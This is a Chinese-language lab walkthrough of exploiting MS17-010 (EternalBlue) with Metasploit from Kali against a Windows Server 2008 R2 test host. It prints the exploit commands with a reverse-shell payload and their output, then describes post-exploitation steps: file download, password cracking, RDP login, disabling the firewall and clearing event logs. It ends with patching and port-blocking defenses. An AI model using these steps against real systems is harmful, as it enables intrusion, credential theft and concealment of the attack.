KALI利用MS17-010漏洞入侵
实验环境
靶机 : Windows Server 2008 R2 ,开放445端口( Windows防火墙不必关闭)。
攻击机: KALI,利用Meterpreter渗透工具漏洞︰MS17-010永恒之蓝(EternalBlue)漏洞。
操作步骤
1)先利用NMAP扫描靶机是否开启了445端口。
2)在kali上启动msfconsole
3)扫描靶机的漏洞情况
4)利用MS17-010漏洞攻击靶机
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue //切换到漏洞攻击脚本
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用反弹链接payload,让靶机主动连接KALI
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129 //靶机IP地址
rhost => 192.168.10.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128 //KAL地址
lhost => 192.168.10.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit //开始攻击
[*] Started reverse TCP handler on 192.168.10.128:4444
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > //攻击成功,此时靶机已经可以被控制
5)列出靶机C盘下的目录文件
6)下载文件
7)破解用户密码
密文可到www.cmd5.com中去破解。
8)远程桌面登录靶机
root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:3389
9)屏幕截图
10)关闭防火墙
meterpreter > shell //进入靶机的命令提示符环境
Process 2848 created.
Channel 4 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\>
C:\>netsh advfirewall set allprofiles state off //关闭靶机的防火墙
netsh advfirewall set allprofiles state off
ȷ����
C:\>
11)清楚事件日志
清除前,在靶机上可以看见所有事件日志。
在KALI上清除日志信息
再去靶机上查看,发现只有一条清楚日志的记录.
MS17-010漏洞防范
1) 打补丁
KB976932 ( SP1 )、KB4012212、KB4012215
2) 利用系统防火墙高级设置阻止向445端口进行连接
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.10.128:4444
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) >
可以看到连接失败!!!